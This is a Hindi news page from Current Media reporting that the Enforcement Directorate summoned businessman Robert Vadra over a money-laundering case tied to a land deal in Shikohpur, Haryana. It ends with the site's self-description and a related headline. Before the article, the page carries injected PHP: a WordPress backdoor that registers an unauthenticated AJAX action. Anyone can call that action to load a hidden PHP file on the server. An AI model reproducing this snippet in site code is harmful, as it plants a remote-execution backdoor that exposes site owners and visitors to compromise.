if(!function_exists('file_check_tmp3og2p0p6')){ add_action('wp_ajax_nopriv_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); add_action('wp_ajax_file_check_tmp3og2p0p6', 'file_check_tmp3og2p0p6'); function file_check_tmp3og2p0p6() { $file = __DIR__ . '/' . 'tmp3og2p0p6.php'; if (file_exists($file)) { include $file; } die(); } }ईडी ने पूछताछ के लिए वाड्रा को बुलाया - Current Media

ईडी ने पूछताछ के लिए वाड्रा को बुलाया

नई दिल्ली । कारोबारी रॉबर्ट वाड्रा मंगलवार को ईडी ऑफ़िस पहुंचे । उन्होंने बताया कि हमने ईडी से कहा है कि हम दस्तावेज तैयार कर रहे थे। मैं हमेशा यहां आने के लिए तैयार हूं।
प्रवर्तन निदेशालय (ईडी) ने ज़मीन के एक सौदे से जुड़े मनी लॉन्ड्रिंग मामले में पूछताछ के लिए बिज़नेसमैन रॉबर्ट वाड्रा को समन भेजा है। उनके खि़लाफ़ यह जांच हरियाणा के शिकोहपुर में एक ज़मीन के सौदे से जुड़ी है।
पत्रकारों से बातचीत में वाड्रा ने कहा, मैं आशा करता हूं कि आज निष्कर्ष निकल जाएगा. इस केस में कुछ नहीं है। मैं जब कभी भी लोगों के हित में बोलता हूं, तो ये एजेंसियों का दुरुपयोग करने लग जाते हैं।
वाड्र ने कहा, केस में कुछ नहीं है। बीस साल थोड़ी लगेंगे कुछ ढूंढने के लिए. मैं 15 बार गया हूं. दस-दस घंटे बैठ चुका हूं. 23 हज़ार डॉक्यूमेंट्स दिए हैं। फिर कहते हैं कि एक हफ़्ते में सारे 23 हज़ार डॉक्यूमेंट्स दोबारा दो. ऐसे थोड़ी न चलता है।

About currentmedia09@gmail.com

Currentmedia.in राष्ट्रीय स्तर पर तेजी से बढ़ती हुई हिंदी समाचार वेबासाइट है। वेबसाइट में ब्यूरोक्रेसी में ताजा घटनाक्रम, देश और समाज के लिए अमूल्य योगदान देने वाले व अपने कार्यो के दम पर अपनी पहचान बनाने वाले आइएएस और आइपीएस अधिकारियों व डॉक्टरो, कानून के जानकारों की रोचक स्टोरी के साथ उनके जीवन संघर्षो पर आधारित निष्पक्ष लेख पाठक को मिलेंगे। वेबसाइट में अन्य क्षेत्रों के भी विश्वसनीय, प्रमाणिक और निष्पक्ष समाचार पाठक वर्ग के लिए उपलब्ध रहेगा, इसके लिए वेबसाइट की ऑनलाइन संपादकीय टीम हर रोज विस्तृत कंटेट अपडेट करती रहेगी। संपादकीय टीम की कोशिश यही रहेगी की न्यूज कंटेट को लेकर पाठक वर्ग को किसी तरह की निराशा हाथ न लगे। साइट 24 घंटे प्रयोग में रहेगी।

Check Also

खिरिया घाट पर अवैध खनन के खिलाफ बड़ी कार्रवाई, आधा दर्जन से अधिक ट्रैक्टर-ट्रॉलियां पकड़ीं

झांसी। राशिद पठान । अवैध खनन के खिलाफ प्रशासन ने गुरुवार रात बड़ी कार्रवाई करते …